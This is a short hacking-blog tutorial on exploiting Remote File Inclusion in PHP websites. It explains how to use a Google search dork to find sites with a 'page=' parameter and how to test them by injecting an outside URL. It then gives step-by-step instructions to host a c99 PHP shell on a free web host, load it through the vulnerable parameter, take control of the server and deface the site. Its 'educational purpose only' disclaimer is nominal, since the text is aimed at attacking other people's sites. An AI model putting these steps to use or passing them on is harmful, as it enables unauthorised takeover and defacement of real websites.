Remote File Inclusion (RFI)

Remote File Inclusion (RFI) - Website Hacking Method - Tutorial
Here the most serious website hacking method "Remote File Inclusion (RFI)". This exploits are very simple and are only found in about 1 in every 10 sites - they are still allot of fun to exploit. In this tutorial i will show
you how to take advantage of this coding error and possibly take control of the site.This hackthepc article is for Educational Purpose Only...so please Use this for knowledge Only !

This articles will be understandable mostly by web developers,or how know some web programming in html,php,asp etc...Lets start..

A Remote File Inclusion vulnerability is where we trick the web server in to putting our file (file uploader / php shell) in to the web page. It then parses our PHP script and we then have full control over the server. The exploit works because when a website calls another page to be displayed except, we edit the url so that the website thinks our shell is the page to display.

Normally, I'm against stuff like this. I believe people should find their own vulnerablesites. But, for the sake of this paper, i will show you how we can use google to get us vulnerable sites.

We will query google like so:


Code:

inurl:"index.php?page="
This query asks google to give us any page with index.php?page= in the url. If we look at it, we can see that 'page' is calling up whatever is after the equals sign. This is where the actual exploit lies. A good test to see if a website is actually vulnerable is to enter
http://www.google.com after the equal sign.


Code:

http://www.site.com/index.php?page=www.google.com
It is not nessesry that every site will work loke above statement....Only those will redirect to google,which having the security holes...
If the full google.com website appears on the page, the websiteis vulnerable. If not, keep looking. To exploit the vulnerability we must first look at the following example of a RFI:


this is an example only,There is no such sites or file....

Code:

http://www.shittysite.com/index.php?page...shell.txt?
A) Get a free host website (like dajoob or free webs)
B) Put a PHP shell (c99) in text form on the site
C) Insert the path to the shell in the vulnerable hosts url,
like the example above.
D) You can then proceed to deface the site etc.

0 comments:

Post a Comment

top